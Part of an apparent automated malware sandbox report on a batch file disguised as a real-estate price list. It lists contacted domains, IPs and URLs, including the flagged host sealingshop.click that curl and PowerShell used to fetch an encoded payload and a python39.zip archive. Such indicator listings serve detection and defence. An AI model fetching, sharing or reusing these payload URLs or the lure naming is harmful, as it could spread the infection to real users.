https://sealingshop.click/bat/encode/rose_tien_en.txt?a=342234erererefdgdsjfwiowjefisjidfsojfoijs4543544325445344eiofujoisuedsfdddddjjjjkfoisuefoiu434534343iosuioeufiosuio453453543543344444345345645745suefiosuieofusoiufiosefuioeuio	0%	Avira URL Cloud	safe
http://bugs.python.org/issue13585	0%	Avira URL Cloud	safe
http://bugs.python.org/issue12029	0%	Avira URL Cloud	safe
https://bugs.python.org/issue29302	0%	Avira URL Cloud	safe
https://sealingshop.click/app/python39.zip	100%	Avira URL Cloud	phishing
http://bugs.python.org/issue14396.	0%	Avira URL Cloud	safe
https://sealingshop.click/config/stu	0%	Avira URL Cloud	safe
https://sealingshop.click	0%	Avira URL Cloud	safe
http://www.egenix.com/files/python/platform.py	0%	Avira URL Cloud	safe
https://chromedevtools.github.io/devtools-protocol/	0%	Avira URL Cloud	safe
http://bugs.python.org/issue19404	0%	Avira URL Cloud	safe
https://eprint.iacr.org/2005/033)	0%	Avira URL Cloud	safe
http://bugs.python.org)	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
google.com	142.250.181.142	true	false	high
www3.l.google.com	172.217.19.206	true	false	high
play.google.com	172.217.19.238	true	false	high
plus.l.google.com	172.217.17.78	true	false	high
sealingshop.click	104.21.36.187	true	true	unknown
www.google.com	142.250.181.68	true	false	high
ogs.google.com	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.google.com/images/hpp/ic_wahlberg_product_core_48.png8.png	false		high
https://www.google.com/xjs/_/js/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAABQAAACAAAAAAEAAAAAAAAAAQBAAEAQAAAEAAAAsAAAQDACAAAAAAgAAIACAR5kCgAARAAAAACAAgACAAAAAAgAAAAEAAAAAAAAFAAAAAAACAAAAAAAAAAACBAAAAAAAAAAAAAgAAEAPAAAAAAAAAAgIAACGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkICEAAAAAAAAAAAAAAAAAAAJEmLmw/d=0/dg=0/br=1/rs=ACT90oGee_XWq732v0KP_WxvdXHuplL1-Q/m=syt1,syt0,VsqSCc,sy1ay,P10Owf,sy19r,sy19p,sysf,gSZvdb,syyb,syya,WlNQGd,sysj,sysh,sysg,syse,DPreE,syyo,syym,nabPbb,syy5,syy3,sylt,sypt,CnSW2d,kQvlef,syyn,fXO0xe?xjs=s4	false		high
https://www.google.com/xjs/_/js/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAABQAAACAAAAAAEAAAAAAAAAAQBAAEAQAAAEAAAAsAAAQDACAAAAAAgAAIACAR5kCgAARAAAAACAAgACAAAAAAgAAAAEAAAAAAAAFAAAAAAACAAAAAAAAAAACBAAAAAAAAAAAAAgAAEAPAAAAAAAAAAgIAACGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkICEAAAAAAAAAAAAAAAAAAAJEmLmw/d=0/dg=0/br=1/rs=ACT90oGee_XWq732v0KP_WxvdXHuplL1-Q/m=lOO0Vd,sy8k,P6sQOc?xjs=s4	false		high
https://www.google.com/gen_204?s=webhp&t=aft&atyp=csi&ei=7TpQZ5ybCP7V7M8PhYbCIQ&rt=wsrt.6131,aft.3561,afti.3561,cbt.219,hst.103,prt.3099&imn=11&ima=2&imad=0&imac=0&ddl=1&wh=870&aftie=NF&aft=1&aftp=870&opi=89978449&dt=&ts=199453	false		high
https://www.google.com/xjs/_/js/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/ck=xjs.hd._XEEj3XSobE.L.B1.O/am=CKkCAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAEHQnAACYAGAXIEAAAAAAAAwAQBBAEAQACAEEEACsAAAQDgCgDACAAgAEIBSAR5kCowARQEAOACUAiR2AAFAgAgABAAHAADJoCEQFIAoAAAACAAAAAAIAAACGBBAIANABEAAGgEgAAEQPAgAAAAAIAgg4EwCGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkoCEAAAAAAAAAAAAAAAAAAAJEmLmw/d=0/dg=0/br=1/ujg=1/rs=ACT90oG2o4pmnD4w9tttYg6zVtJ0zPXSTw/m=syxu,syxx,syxw,sywe,sywf,syxv,syxs,syxt,KHourd,MpJwZc,UUJqVe,sy7d,sOXFj,sy7c,s39S4,oGtAuc,NTMZac,nAFL3,sy7q,sy7p,q0xTif,y05UD,sy12f,sy18v,sy18p,syx0,sy18i,sywz,sywy,sywx,sy18o,sy13p,sy18f,sy13t,sy18n,sy12b,sy18j,sygz,sy13u,sy18q,sy122,sy18m,sy18k,sy18l,sy18s,sy18a,sy18g,sy189,sy18e,sy18b,sy186,sy14p,sy13w,sy13x,syx5,syx6,epYOx?xjs=s3	false		high
https://www.google.com/gen_204?atyp=csi&ei=7TpQZ5ybCP7V7M8PhYbCIQ&s=webhp&t=all&imn=11&ima=2&imad=0&imac=0&ddl=1&wh=870&aftie=NF&aft=1&aftp=870&adh=&ime=1&imex=1&imeh=0&imeha=0&imehb=0&imea=0&imeb=0&imel=0&imed=0&imeeb=0&scp=0&cb=199153&ucb=199153&ts=199453&dt=&mem=ujhs.9,tjhs.12,jhsl.2173,dm.8&nv=ne.1,feid.74cc60e6-3e8c-4d5b-b0fb-21623cc82356&net=dl.1300,ect.3g,rtt.750,sd.0&hp=&sys=hc.4&p=bs.true&rt=hst.103,cbt.219,prt.3099,afti.3561,aftip.3096,aft.3561,aftqf.3561,xjses.5556,xjsee.5641,xjs.5641,lcp.3588,fcp.3106,wsrt.6131,cst.1700,dnst.139,rqst.1645,rspt.769,sslt.1700,rqstt.5255,unt.3414,cstt.3554,dit.9239&zx=1733311218317&opi=89978449	false		high
https://www.google.com/xjs/_/js/md=2/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAABQAAACAAAAAAEAAAAAAAAAAQBBAEAQAAAEAAAAsAAAQDACAAAAAAgAAIACAR5kCgAARAAAAACAAgACAAAAAAgAAAAEAAAAAAAAFAAAAAAACAAAAAAAAAAACBAAAAAAAAAAAAAgAAEAPAAAAAAAAAAgIAACGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkoCEAAAAAAAAAAAAAAAAAAAJEmLmw/rs=ACT90oHriNedtl0slfHQQK7yvtGqa3GaPw	false		high
https://sealingshop.click/app/python39.zip	true	Avira URL Cloud: phishing	unknown
https://www.google.com/xjs/_/ss/k=xjs.hd._XEEj3XSobE.L.B1.O/am=CKkCAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAEHQnAAAYAGAXIEAAAAAAAAwAQBBAAAQACAEEEACsAAAAAgCgDACAAgAEABQAAAACowAQQEAOACUACR2AAFAgAAABAAHAADJoCEQFIAoAAAAAAAAAAAIAAACGABAIANABEAAGgEgAAEQPAgAAAAAIAgAwEwCGgAEIAAAAAAAAIAMAAAAYUkAAAAAAAAAAAAAAAAAAgCAYCgAoCAAAAAAAAAAAAAAAAAAAAIEmCA/d=1/ed=1/br=1/rs=ACT90oFG6YoYHEZhg5Ki528uVBEREMKmXQ/m=cdos,hsm,jsa,mb4ZUb,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl,YV5bee,d,csi	false		high
https://www.google.com/client_204?atyp=i&biw=1034&bih=870&ei=7TpQZ5ybCP7V7M8PhYbCIQ&opi=89978449	false		high
https://sealingshop.click/bat/encode/rose_tien_en.txt?a=342234erererefdgdsjfwiowjefisjidfsojfoijs4543544325445344eiofujoisuedsfdddddjjjjkfoisuefoiu434534343iosuioeufiosuio453453543543344444345345645745suefiosuieofusoiufiosefuioeuio	true	Avira URL Cloud: safe	unknown
https://www.google.com/favicon.ico	false		high
https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-law.gif	false		high
https://www.google.com/gen_204?s=webhp&t=cap&atyp=csi&ei=7TpQZ5ybCP7V7M8PhYbCIQ&rt=wsrt.6131,cbt.219,hst.103&opi=89978449&dt=&ts=300	false		high
https://www.google.com/images/searchbox/desktop_searchbox_sprites318_hr.webp	false		high
https://www.google.com/xjs/_/js/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/ck=xjs.hd._XEEj3XSobE.L.B1.O/am=CKkCAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAEHQnAACYAGAXIEAAAAAAAAwAQBBAEAQACAEEEACsAAAQDgCgDACAAgAEIBSAR5kCowARQEAOACUAiR2AAFAgAgABAAHAADJoCEQFIAoAAAACAAAAAAIAAACGBBAIANABEAAGgEgAAEQPAgAAAAAIAgg4EwCGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkoCEAAAAAAAAAAAAAAAAAAAJEmLmw/d=0/dg=0/br=1/ujg=1/rs=ACT90oG2o4pmnD4w9tttYg6zVtJ0zPXSTw/m=sb_wiz,aa,abd,sy17h,syfu,syfl,syfj,syfk,syfm,syfv,syfw,syfq,syfr,syfp,syfo,syel,syfn,syfd,syfc,syfe,syfb,syfg,sy16c,syg6,sy17f,syyh,syg5,syg4,syg3,async,ifl,pHXghd,sf,syic,sy3jj,sonic,sy3jp,syhi,sygy,sy3j2,sy3j5,sy265,sydz,sy9w,sy9h,sy9g,spch,syte,sytd,rtH1bd,sy19c,sy15f,sy14w,sy125,syd8,sy19b,SMquOb,sy89,sy88,syez,syf8,syf6,syf5,syey,syew,syeu,sy83,sy80,sy82,syet,syex,syes,sybf,syba,sybd,syal,syar,syak,syaj,syai,sya6,sybb,syaz,syb0,syb6,syap,syb5,syay,syav,syag,syan,syb1,sya8,syaa,syab,sya7,syaq,syaf,syac,sybi,sya2,sy9z,sybh,sy9r,sy9j,sy9m,sy9y,sya5,syb2,syer,syeq,syen,syem,sy86,uxMpU,syei,sybp,sybn,sybj,syat,sybl,sybg,sy8p,sy8o,sy8n,Mlhmy,QGR0gd,aurFic,sy8y,fKUV3e,OTA3Ae,sy8a,OmgaI,EEDORb,PoEs9b,Pjplud,sy8j,A1yn5d,YIZmRd,uY49fb,sy7y,sy7w,sy7u,sy7v,sy7t,sy7s,byfTOb,lsjVmc,LEikZe,kWgXee,ovKuLd,sgY6Zb,qafBPd,ebZ3mb,dowIGb,sy19f,sy19d,syxe,sytj,d5EhJe,sy19w,fCxEDd,syup,sy19v,sy19u,sy19t,sy19m,sy19j,sy19k,sy174,sy16y,syx2,syx1,T1HOxc,sy19l,sy19i,zx30Y,sy19y,sy19x,sy19q,sy15r,Wo3n8,sysv,loL8vb,sysz,sysy,sysx,ms4mZb,syrx,B2qlPe,syua,NzU6V,syyt,sygi,zGLm3b,syvu,syvv,syvl,DhPYme,syxz?xjs=s3	false		high
https://www.google.com/	false		high
https://www.google.com/xjs/_/js/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAABQAAACAAAAAAEAAAAAAAAAAQBAAEAQAAAEAAAAsAAAQDACAAAAAAgAAIACAR5kCgAARAAAAACAAgACAAAAAAgAAAAEAAAAAAAAFAAAAAAACAAAAAAAAAAACBAAAAAAAAAAAAAgAAEAPAAAAAAAAAAgIAACGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkICEAAAAAAAAAAAAAAAAAAAJEmLmw/d=0/dg=0/br=1/rs=ACT90oGee_XWq732v0KP_WxvdXHuplL1-Q/m=aLUfP?xjs=s4	false		high
https://www.google.com/gen_204?atyp=csi&ei=7TpQZ5ybCP7V7M8PhYbCIQ&s=promo&rt=hpbas.18220,hpbarr.2868&zx=1733311233758&opi=89978449	false		high
https://www.google.com/gen_204?atyp=i&ei=7TpQZ5ybCP7V7M8PhYbCIQ&dt19=2&prm23=0&zx=1733311230896&opi=89978449	false		high
https://www.google.com/gen_204?atyp=i&ei=7TpQZ5ybCP7V7M8PhYbCIQ&vet=10ahUKEwjcxZO5_42KAxX-KvsDHQWDMAQQuqMJCCU..s&bl=YYC8&s=webhp&lpl=CAUYATAVOANiCAgYEJ-Zv7wB&zx=1733311230938&opi=89978449	false		high
https://sealingshop.click/config/stu	true	Avira URL Cloud: safe	unknown
https://www.google.com/gen_204?atyp=csi&ei=AjtQZ47sD4i-xc8Pza6zsA0&s=async&astyp=hpba&ima=0&imn=0&mem=ujhs.9,tjhs.12,jhsl.2173,dm.8&nv=ne.1,feid.74cc60e6-3e8c-4d5b-b0fb-21623cc82356&hp=&rt=ttfb.2860,st.2863,bs.27,aaft.2864,acrt.2865,art.2866&zx=1733311233757&opi=89978449	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://bugs.python.org/issue13585	python.exe, 00000012.00000003.3176942722.0000012D51E7B000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3176106124.0000012D51E75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf	python.exe, 00000012.00000003.3202808995.0000012D51E77000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204623960.0000012D51EFF000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204326932.0000012D51E77000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205916188.0000012D51F07000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204715281.0000012D51DB5000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204623960.0000012D51F07000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.broofa.com	chromecache_2326.7.dr	false		high
https://github.com/mhammond/pywin32	dde.pyd.16.dr	false		high
http://sealingshop.click	powershell.exe, 00000005.00000002.2194147217.0000019E0F060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000006.00000003.2140110358.00000197924D0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.python.org/download/releases/2.3/mro/.	python.exe, 00000012.00000003.3122769698.0000012D52309000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3123681580.0000012D522F9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3124729236.0000012D5153C000.00000004.00000020.00020000.00000000.sdmp, functools.cpython-39.pyc.1294162032944.18.dr	false		high
https://github.com/urllib3/urllib3/issues/2680	__init__.cpython-39.pyc.1294205290512.18.dr	false		high
http://stackoverflow.com/questions/267399/how-do-you-match-only-valid-roman-numerals-with-a-regular-	pyparsing.py.16.dr	false		high
http://bugs.python.org/issue19619	python.exe, 00000012.00000003.3106850979.0000012D51569000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3106666922.0000012D5159F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sealingshop.click/py/rose_tien-oC:	curl.exe, 00000011.00000002.3104796278.0000021E0D390000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.	chromecache_2326.7.dr	false		high
http://bugs.python.org/issue5845#msg198636	python.exe, 00000012.00000003.3108601415.0000012D515A9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3108466132.0000012D51E05000.00000004.00000020.00020000.00000000.sdmp	false		high
http://bugs.python.org/issue12029	python.exe, 00000012.00000003.3177055022.0000012D525FC000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3176942722.0000012D51E7B000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3176106124.0000012D51E75000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3177018352.0000012D525FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.2194147217.0000019E0F364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2221477899.0000019E1DC38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2221477899.0000019E1DB02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.geocities.com/rick_lively/MANUALS/ENV/MSWIN/PROCESSI.HTM	python.exe, 00000012.00000003.3177289327.0000012D523BB000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3182698577.0000012D523BB000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3179926783.0000012D527F0000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3178047469.0000012D527F0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ogs.google.com/widget/callout?eom=1	chromecache_2304.7.dr	false		high
https://sealingshop.click/bat/encode/rose_tien_en.txt?a=342234erererefdgdsjfwiowjefisjidfsojfoijs454	curl.exe, 00000003.00000002.2115821208.000001B2FC480000.00000004.00000020.00020000.00000000.sdmp, Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat	false	Avira URL Cloud: safe	unknown
https://tools.ietf.org/html/rfc3610	python.exe, 00000012.00000003.3204009322.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202197981.0000012D520C0000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3199473048.0000012D51DF2000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3198800218.0000012D520C0000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202908008.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205916188.0000012D51F07000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204623960.0000012D51F07000.00000004.00000020.00020000.00000000.sdmp, _mode_ccm.cpython-39.pyc.16.dr	false		high
http://www.python.org/dev/peps/pep-0205/	weakref.py.16.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000005.00000002.2194147217.0000019E0DA81000.00000004.00000800.00020000.00000000.sdmp	false		high
http://stackoverflow.com/questions/15390807/integer-square-root-in-python	_IntegerNative.py.16.dr	false		high
https://bugs.python.org/msg352381	python.exe, 00000012.00000003.3131208113.0000012D523A4000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3131208113.0000012D5233A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3134361343.0000012D523A5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://json.org	decoder.cpython-39.pyc.1294207632560.18.dr	false		high
https://github.com/liris/websocket-client/commit/b96a2e8fa765753e82eea531adb19716b52ca3ca#commitcomm	_http.py.16.dr	false		high
https://httpbin.org/get	sessions.cpython-39.pyc.1294209086640.18.dr	false		high
http://cypherpunks.venona.com/date/1994/09/msg00420.html	test_ARC4.py.16.dr	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000005.00000002.2194147217.0000019E0F2DD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://csrc.nist.gov/publications/nistpubs/800-17/800-17.pdf	test_DES.py.16.dr	false		high
http://bugs.python.org/issue14396.	python.exe, 00000012.00000003.3167939396.0000012D51FC9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3174257995.0000012D51FCA000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3170974101.0000012D51DDA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000005.00000002.2194147217.0000019E0F2DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2227000571.0000019E25B6A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.python.org	redirector_asynch.py.16.dr, guidemo.py.16.dr	false		high
https://go.micro	powershell.exe, 00000005.00000002.2194147217.0000019E0E6B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com/js/api.js	chromecache_2335.7.dr	false		high
https://www.google.com/_/og/promos/	chromecache_2304.7.dr	false		high
https://contoso.com/Icon	powershell.exe, 00000005.00000002.2221477899.0000019E1DB02000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/psf/requests/issues/3772	auth.py1.16.dr	false		high
http://php.net/manual/en/function.version-compare.php	python.exe, 00000012.00000003.3177289327.0000012D523BB000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3182698577.0000012D523BB000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3179926783.0000012D527F0000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3178047469.0000012D527F0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000006.00000002.3306468306.0000019792600000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	python.exe, 00000012.00000003.3134323043.0000012D527E1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3131208113.0000012D523A4000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3134521754.0000012D51F0F000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3131208113.0000012D5233A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3134361343.0000012D523A5000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3134427839.0000012D51DA9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://sourceware.org/pthreads-win32/manual/pthread_barrier_init.html	python.exe, 00000012.00000003.3160906762.0000012D5234A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3162088539.0000012D5234A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3174013075.0000012D51DA1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3.8/library/ssl.html?highlight=sslkeylogfile#ssl.SSLContext.keylog_filename	_http.py.16.dr	false		high
https://github.com/python/cpython/pull/7160#discussion_r195405230	python.exe, 00000012.00000003.3149656939.0000012D52364000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3148921372.0000012D5234B000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3151020216.0000012D51DA9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.17.2713&rep=rep1&type=pdf	python.exe, 00000012.00000003.3193841068.0000012D527FD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000005.00000002.2194147217.0000019E0F2DD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bugs.python.org/issue29302	python.exe, 00000012.00000003.3177055022.0000012D525FC000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3176942722.0000012D51E7B000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3181198862.0000012D525FC000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3181124946.0000012D525FB000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3176106124.0000012D51E75000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3177018352.0000012D525FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.python.org/psf/license/	python.exe, 00000012.00000003.3108601415.0000012D515A9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3108466132.0000012D51E05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://play.google.com/log?format=json&hasfast=true	chromecache_2326.7.dr	false		high
http://www.egenix.com/files/python/platform.py	python.exe, 00000012.00000003.3177289327.0000012D523BB000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3182698577.0000012D523BB000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3179926783.0000012D527F0000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3178047469.0000012D527F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lensfrontend-pa.clients6.google.com/v1/gsessionid	chromecache_2326.7.dr	false		high
http://csrc.nist.gov/publications/nistpubs/800-38a/sp8	python.exe, 00000012.00000003.3197427310.0000012D51DB8000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3194209339.0000012D51DB8000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3200218590.0000012D51DB8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tools.ietf.org/html/rfc5234	_abnf.cpython-312.pyc.16.dr	false		high
https://eprint.iacr.org/2005/033)	python.exe, 00000012.00000003.3197427310.0000012D51DF2000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3197427310.0000012D51DB8000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3194209339.0000012D51DB8000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3200218590.0000012D51DB8000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3194209339.0000012D51DF2000.00000004.00000020.00020000.00000000.sdmp, _mode_openpgp.py.16.dr	false	Avira URL Cloud: safe	unknown
https://www.python.org/psf/license/)	python.exe, 00000012.00000003.3108601415.0000012D515A9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm	python.exe, 00000012.00000003.3134323043.0000012D527E1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3131208113.0000012D523A4000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3134521754.0000012D51F0F000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3131208113.0000012D5233A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3134361343.0000012D523A5000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3134427839.0000012D51DA9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.rfc-editor.org/info/rfc7253	python.exe, 00000012.00000003.3205834938.0000012D51E85000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205543689.0000012D525B9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205306513.0000012D523B3000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3207924474.0000012D523B3000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205916188.0000012D51F07000.00000004.00000020.00020000.00000000.sdmp	false		high
http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf	python.exe, 00000012.00000003.3204009322.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202197981.0000012D520C0000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3199473048.0000012D51DF2000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3198800218.0000012D520C0000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202908008.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205916188.0000012D51F07000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204623960.0000012D51F07000.00000004.00000020.00020000.00000000.sdmp, _mode_ccm.cpython-39.pyc.16.dr	false		high
http://csrc.nist.gov/	python.exe, 00000012.00000003.3152248846.0000012D51534000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3142508753.0000012D51534000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mahler:8092/site-updates.py	request.cpython-39.pyc.1294208279984.18.dr	false		high
http://code.activestate.com/recipes/259174/	python.exe, 00000012.00000003.3126988654.0000012D5200A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3124982099.0000012D51F66000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3123841346.0000012D52009000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3124982099.0000012D52009000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tools.ietf.org/html/rfc5869	python.exe, 00000012.00000003.3202808995.0000012D51E77000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204009322.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205543689.0000012D525B9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202908008.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204623960.0000012D51EFF000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204326932.0000012D51E77000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204715281.0000012D51DB5000.00000004.00000020.00020000.00000000.sdmp	false		high
